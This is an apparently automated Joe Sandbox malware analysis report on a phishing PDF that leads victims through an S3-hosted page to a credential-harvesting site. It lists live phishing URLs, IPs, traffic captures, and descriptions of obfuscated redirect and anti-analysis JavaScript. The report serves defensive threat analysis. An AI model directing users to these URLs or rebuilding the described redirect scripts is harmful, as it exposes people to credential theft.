Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Invdoc80.pdf

Overview

General Information

Sample name:Invdoc80.pdf
Analysis ID:1591561
MD5:10d528b39a9373b88db284de96e1fddf
SHA1:5ed0ecfc82feca91301f40901f574343a7e86db0
SHA256:98e62c61733cb015fb68c76dc36def4861cbff9ecec1c5cb8dab86544b84fd8b
Infos:

Detection

HTMLPhisher
Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Yara detected HtmlPhish44
AI detected landing page (webpage, office document or email)
AI detected suspicious Javascript
Detected non-DNS traffic on DNS port
IP address seen in connection with other malware
Internet Provider seen in connection with other malware

Classification

  • System is w10x64
  • Acrobat.exe (PID: 7520 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Invdoc80.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
    • AcroCEF.exe (PID: 7684 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • AcroCEF.exe (PID: 7884 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2156 --field-trial-handle=1576,i,4807807924822789699,11470984042719597110,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • chrome.exe (PID: 8608 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "https://oulkiate.s3.ap-southeast-1.amazonaws.com/index.html" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 8796 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 --field-trial-handle=1992,i,17273167691560878123,8173139342692209947,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_255JoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
    No Sigma rule has matched
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: https://sgd.trilivarnor.ru/favicon.icoAvira URL Cloud: Label: phishing

    Phishing

    barindex
    Source: Yara matchFile source: dropped/chromecache_255, type: DROPPED
    Source: PDF documentJoe Sandbox AI: PDF document contains prominent button: 'review document'
    Source: https://sgd.trilivarnor.ru/NiKU3ISg/Joe Sandbox AI: Page contains button: 'Validate my click' Source: '2.1.pages.csv'
    Source: 0.2.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://sgd.trilivarnor.ru/NiKU3ISg/... This script demonstrates several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser debugging and developer tools, and redirecting the user to a suspicious domain. The combination of these behaviors suggests a malicious intent to prevent analysis and potentially compromise the user's security.
    Source: 0.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://oulkiate.s3.ap-southeast-1.amazonaws.com/i... This script demonstrates high-risk behavior by redirecting the user to a suspicious domain without their consent. It extracts the path (likely an email address) from the URL and appends it to the redirect URL, which is a potential indicator of data exfiltration. The use of a hardcoded, obfuscated redirect URL further increases the risk. Overall, this script exhibits clear signs of malicious intent and should be considered a high-risk security threat.
    Source: 0.3.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://sgd.trilivarnor.ru/NiKU3ISg/... This script demonstrates multiple high-risk behaviors, including dynamic code execution via the Proxy object and eval, potential data exfiltration, and obfuscated code. The combination of these factors indicates a high likelihood of malicious intent, warranting a maximum risk score of 10.
    Source: https://oulkiate.s3.ap-southeast-1.amazonaws.com/index.htmlHTTP Parser: No favicon
    Source: https://sgd.trilivarnor.ru/NiKU3ISg/HTTP Parser: No favicon
    Source: global trafficTCP traffic: 192.168.2.4:57656 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.4:56634 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.4:59729 -> 1.1.1.1:53
    Source: Joe Sandbox ViewIP Address: 151.101.130.137 151.101.130.137
    Source: Joe Sandbox ViewIP Address: 151.101.130.137 151.101.130.137
    Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
    Source: Joe Sandbox ViewIP Address: 151.101.66.137 151.101.66.137
    Source: Joe Sandbox ViewIP Address: 151.101.66.137 151.101.66.137
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /index.html HTTP/1.1Host: oulkiate.s3.ap-southeast-1.amazonaws.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /NiKU3ISg/ HTTP/1.1Host: sgd.trilivarnor.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://oulkiate.s3.ap-southeast-1.amazonaws.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://sgd.trilivarnor.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: sgd.trilivarnor.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://sgd.trilivarnor.ru/NiKU3ISg/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InRCQTNLMWlndFdNall2QTRXWThOUEE9PSIsInZhbHVlIjoiSm9ybnVSZkw2SStNL1M1ZVU3bDJncW1HMjNMMmhEZ1ZOZ05xOEFldUxXWFBNOHJkY3JGY3cwWFFTZ09Ccm01K2cvTnU1cXVNSlUrRUk4YU9vcGtMQ3dVV24zZmNGZHVUaXdLRHFaK0lnVWpvL21rUjFaQ1FBbUVTNTg5ZFVKd0EiLCJtYWMiOiI4MTc2OTIxYWFkMTVhMDg0YWU1NWY4MjRjOTA1YjQwODczYjNhZWU1NzIwNzYwMjlmODg1N2NkYWY1ZDU1MGU3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IitlalVWMURzZXY5aXBaWG9XdWhjWmc9PSIsInZhbHVlIjoidlF3U1V4MitCNnFsTXlaZlNWLzlLUmc0Z3NmUzFKM1B0WkdTTW1OZ3pOTWdNQ2tOeWtkVW54TDlJak5lY0ZiY09oMjNzbWVHQlNpbnZuVTB6eFREeGhEanFyb3RSaEtIUHQ5Q2syVHhFMVpSV3lLOGg2eWk1bWRRWCtCa0s0cXQiLCJtYWMiOiI5MWM4MzZhYjY1NDg3ZjYyZjI4ZDZkZTY2ZTQyMjMwOWZiMDA1Y2M5MDQ1NTkzMDJiYTRmMDhmYmMwZGYwMTg4IiwidGFnIjoiIn0%3D
    Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
    Source: global trafficDNS traffic detected: DNS query: oulkiate.s3.ap-southeast-1.amazonaws.com
    Source: global trafficDNS traffic detected: DNS query: sgd.trilivarnor.ru
    Source: global trafficDNS traffic detected: DNS query: code.jquery.com
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
    Source: unknownHTTP traffic detected: POST /report/v4?s=jmRf16zT58AexhnhmMyus9lvl3qZNKEHEVidBqmcgsGFug330Qi4deMIoU7t9JKIUQd7EqucoazHf4VrMLyQnB%2F4psuSGElWEs3s7S2J2TeaaaDUXrEyO7QEZILLsg%3D%3D HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 434Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 03:46:08 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jmRf16zT58AexhnhmMyus9lvl3qZNKEHEVidBqmcgsGFug330Qi4deMIoU7t9JKIUQd7EqucoazHf4VrMLyQnB%2F4psuSGElWEs3s7S2J2TeaaaDUXrEyO7QEZILLsg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=4873&min_rtt=4857&rtt_var=1387&sent=7&recv=10&lost=0&retrans=0&sent_bytes=4208&recv_bytes=3764&delivery_rate=586370&cwnd=253&unsent_bytes=0&cid=37ae0ebd5f61a425&ts=12431&x=0"CF-Cache-Status: EXPIREDServer: cloudflareCF-RAY: 9022e07ff8af8236-IADserver-timing: cfL4;desc="?proto=TCP&rtt=7118&min_rtt=7112&rtt_var=2679&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1902&delivery_rate=407707&cwnd=32&unsent_bytes=0&cid=08c5ce2a4b0ed323&ts=2331&x=0"
    Source: 77EC63BDA74BD0D0E0426DC8F80085060.1.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
    Source: 2D85F72862B55C4EADD9E66E06947F3D0.1.drString found in binary or memory: http://x1.i.lencr.org/
    Source: chromecache_257.10.drString found in binary or memory: https://Sgd.trilivarnor.ru/NiKU3ISg/
    Source: Invdoc80.pdfString found in binary or memory: https://oulkiate.s3.ap-southeast-1.amazonaws.com/index.html)
    Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
    Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
    Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59771
    Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
    Source: unknownNetwork traffic detected: HTTP traffic on port 59771 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
    Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
    Source: classification engineClassification label: mal64.phis.winPDF@44/56@13/8
    Source: Invdoc80.pdfInitial sample: https://oulkiate.s3.ap-southeast-1.amazonaws.com/index.html
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journalJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-14 22-45-39-701.logJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
    Source: unknownProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Invdoc80.pdf"
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2156 --field-trial-handle=1576,i,4807807924822789699,11470984042719597110,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "https://oulkiate.s3.ap-southeast-1.amazonaws.com/index.html"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 --field-trial-handle=1992,i,17273167691560878123,8173139342692209947,262144 /prefetch:8
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2156 --field-trial-handle=1576,i,4807807924822789699,11470984042719597110,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 --field-trial-handle=1992,i,17273167691560878123,8173139342692209947,262144 /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: Invdoc80.pdfInitial sample: PDF keyword /JS count = 0
    Source: Invdoc80.pdfInitial sample: PDF keyword /JavaScript count = 0
    Source: A978ab5_n7fosw_5vc.tmp.0.drInitial sample: PDF keyword /JS count = 0
    Source: A978ab5_n7fosw_5vc.tmp.0.drInitial sample: PDF keyword /JavaScript count = 0
    Source: Invdoc80.pdfInitial sample: PDF keyword /EmbeddedFile count = 0
    Source: Invdoc80.pdfInitial sample: PDF keyword obj count = 72
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire Infrastructure1
    Spearphishing Link
    Windows Management Instrumentation2
    Browser Extensions
    1
    Process Injection
    1
    Masquerading
    OS Credential Dumping1
    System Information Discovery
    Remote ServicesData from Local System1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
    Process Injection
    LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
    Ingress Tool Transfer
    Traffic DuplicationData Destruction
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://sgd.trilivarnor.ru/favicon.ico100%Avira URL Cloudphishing
    https://oulkiate.s3.ap-southeast-1.amazonaws.com/index.html)0%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    bg.microsoft.map.fastly.net
    199.232.210.172
    truefalse
      high
      a.nel.cloudflare.com
      35.190.80.1
      truefalse
        high
        code.jquery.com
        151.101.130.137
        truefalse
          high
          www.google.com
          216.58.206.36
          truefalse
            high
            s3-r-w.ap-southeast-1.amazonaws.com
            52.219.125.106
            truefalse
              high
              sgd.trilivarnor.ru
              104.21.18.22
              truetrue
                unknown
                oulkiate.s3.ap-southeast-1.amazonaws.com
                unknown
                unknowntrue
                  unknown
                  x1.i.lencr.org
                  unknown
                  unknownfalse
                    high
                    NameMaliciousAntivirus DetectionReputation
                    https://a.nel.cloudflare.com/report/v4?s=jmRf16zT58AexhnhmMyus9lvl3qZNKEHEVidBqmcgsGFug330Qi4deMIoU7t9JKIUQd7EqucoazHf4VrMLyQnB%2F4psuSGElWEs3s7S2J2TeaaaDUXrEyO7QEZILLsg%3D%3Dfalse
                      high
                      https://sgd.trilivarnor.ru/NiKU3ISg/true
                        unknown
                        https://code.jquery.com/jquery-3.6.0.min.jsfalse
                          high
                          https://oulkiate.s3.ap-southeast-1.amazonaws.com/index.htmlfalse
                            unknown
                            https://sgd.trilivarnor.ru/favicon.icofalse
                            • Avira URL Cloud: phishing
                            unknown
                            NameSourceMaliciousAntivirus DetectionReputation
                            http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.1.drfalse
                              high
                              https://Sgd.trilivarnor.ru/NiKU3ISg/chromecache_257.10.drtrue
                                unknown
                                https://oulkiate.s3.ap-southeast-1.amazonaws.com/index.html)Invdoc80.pdffalse
                                • Avira URL Cloud: safe
                                unknown
                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs
                                IPDomainCountryFlagASNASN NameMalicious
                                104.21.18.22
                                sgd.trilivarnor.ruUnited States
                                13335CLOUDFLARENETUStrue
                                52.219.125.106
                                s3-r-w.ap-southeast-1.amazonaws.comUnited States
                                16509AMAZON-02USfalse
                                216.58.206.36
                                www.google.comUnited States
                                15169GOOGLEUSfalse
                                151.101.130.137
                                code.jquery.comUnited States
